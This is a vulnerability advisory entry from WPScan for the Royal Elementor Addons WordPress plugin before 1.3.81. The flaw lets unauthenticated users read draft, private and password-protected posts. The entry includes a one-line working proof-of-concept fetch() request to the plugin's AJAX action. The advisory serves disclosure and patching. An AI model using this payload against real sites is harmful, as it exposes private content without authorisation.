Lucene search

K
wpvulndbKrzysztof Zając (CERT PL)WPVDB-ID:DEBD8498-5770-4270-9EE1-1503E675EF34
HistoryDec 06, 2023 - 12:00 a.m.

Royal Elementor Addons and Templates < 1.3.81 - Unauthenticated Arbitrary Post Read

2023-12-0600:00:00
Krzysztof Zając (CERT PL)
wpscan.com
plugin vulnerability
unauthenticated access
ajax action

7 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

54.7%

Description The plugin does not ensure that users accessing posts via an AJAX action (and REST endpoint, currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content

PoC

WooCommerce needs to be installed and activated. Then, run the below command in the developer console of the web browser while being on the blog as unauthenticated user (4 being the ID of a Draft, Private or Password protected post) (await fetch(“/wp-admin/admin-ajax.php?action=wpr_get_page_content”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “wpr_compare_page_id=4”, “method”: “POST”, })).text();

CPENameOperatorVersion
eq1.3.81

7 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

54.7%

Related for WPVDB-ID:DEBD8498-5770-4270-9EE1-1503E675EF34